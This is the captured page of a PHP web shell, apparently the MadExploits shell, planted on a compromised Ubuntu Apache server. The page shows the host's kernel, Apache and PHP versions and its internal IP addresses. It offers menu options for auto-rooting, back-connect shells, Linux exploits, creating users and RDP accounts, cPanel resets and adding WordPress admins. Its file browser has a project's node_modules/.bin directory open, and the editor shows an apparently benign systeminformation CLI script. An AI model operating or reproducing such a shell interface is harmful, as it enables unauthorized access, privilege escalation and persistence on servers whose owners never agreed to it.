Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
.bin /
[ HOME SHELL ]
Name
Size
Permission
Action
acorn
60
B
-rwxrwxr-x
atob
122
B
-rwxrwxr-x
autoprefixer
554
B
-rwxrwxr-x
blessed
301
B
-rwxrwxr-x
browserslist
4.25
KB
-rwxrwxr-x
cssesc
3.03
KB
-rwxrwxr-x
escodegen
2.65
KB
-rwxrwxr-x
esgenerate
2.36
KB
-rwxrwxr-x
eslint
5.33
KB
-rwxrwxr-x
esparse
4.83
KB
-rwxrwxr-x
esvalidate
7.56
KB
-rwxrwxr-x
flatiron
598
B
-rwxrwxr-x
forever
60
B
-rwxrwxr-x
jiti
386
B
-rwxrwxr-x
js-yaml
2.67
KB
-rwxrwxr-x
json5
2.17
KB
-rwxrwxr-x
loose-envify
356
B
-rwxrwxr-x
mkdirp
731
B
-rwxrwxr-x
n
49.97
KB
-rwxrwxr-x
nanoid
1.1
KB
-rwxrwxr-x
ncp
1.06
KB
-rwxrwxr-x
needle
1.04
KB
-rwxrwxr-x
next
5.87
KB
-rwxrwxr-x
node
93.47
MB
-rwxrwxr-x
node-gyp-build
1.99
KB
-rwxrwxr-x
node-gyp-build-optional
143
B
-rwxrwxr-x
node-gyp-build-test
398
B
-rwxrwxr-x
node-which
985
B
-rwxrwxr-x
pm2
56
B
-rwxrwxr-x
pm2-dev
59
B
-rwxrwxr-x
pm2-docker
67
B
-rwxrwxr-x
pm2-runtime
67
B
-rwxrwxr-x
prettyjson
1.74
KB
-rwxrwxr-x
ps-tree
257
B
-rwxrwxr-x
resolve
1.5
KB
-rwxrwxr-x
rimraf
1.83
KB
-rwxrwxr-x
semver
4.71
KB
-rwxrwxr-x
sucrase
55
B
-rwxrwxr-x
sucrase-node
623
B
-rwxrwxr-x
systeminformation
3.96
KB
-rwxrwxr-x
tailwind
148
B
-rwxrwxr-x
tailwindcss
148
B
-rwxrwxr-x
tsc
45
B
-rwxrwxr-x
tsserver
50
B
-rwxrwxr-x
update-browserslist-db
912
B
-rwxrwxr-x
uuid
44
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systeminformation
#!/usr/bin/env node 'use strict'; // @ts-check // ================================================================================== // cli.js // ---------------------------------------------------------------------------------- // Description: System Information - library // for Node.js // Copyright: (c) 2014 - 2024 // Author: Sebastian Hildebrandt // ---------------------------------------------------------------------------------- // License: MIT // ================================================================================== // ---------------------------------------------------------------------------------- // Dependencies // ---------------------------------------------------------------------------------- const si = require('./index'); const lib_version = require('../package.json').version; function capFirst(string) { return string[0].toUpperCase() + string.slice(1); } function printLines(obj) { for (const property in obj) { console.log(capFirst(property) + ' '.substring(0, 17 - property.length) + ': ' + (obj[property] || '')); } console.log(); } function info() { console.log('┌─────────────────────────────────────────────────────────────────────────────────────────┐'); console.log('│ SYSTEMINFORMATION '.substring(0, 80 - lib_version.length) + 'Version: ' + lib_version + ' │'); console.log('└─────────────────────────────────────────────────────────────────────────────────────────┘'); si.osInfo().then(res => { console.log(); console.log('Operating System:'); console.log('──────────────────────────────────────────────────────────────────────────────────────────'); delete res.serial; delete res.servicepack; delete res.logofile; delete res.fqdn; delete res.uefi; printLines(res); si.system().then(res => { console.log('System:'); console.log('──────────────────────────────────────────────────────────────────────────────────────────'); delete res.serial; delete res.uuid; delete res.sku; delete res.uuid; printLines(res); si.cpu().then(res => { console.log('CPU:'); console.log('──────────────────────────────────────────────────────────────────────────────────────────'); delete res.cache; delete res.governor; delete res.flags; delete res.virtualization; delete res.revision; delete res.voltage; delete res.vendor; delete res.speedMin; delete res.speedMax; printLines(res); }); }); }); } // ---------------------------------------------------------------------------------- // Main // ---------------------------------------------------------------------------------- (function () { const args = process.argv.slice(2); if (args[0] === 'info') { info(); } else { si.getStaticData().then( ((data) => { data.time = si.time(); console.log(JSON.stringify(data, null, 2)); } )); } })();
Close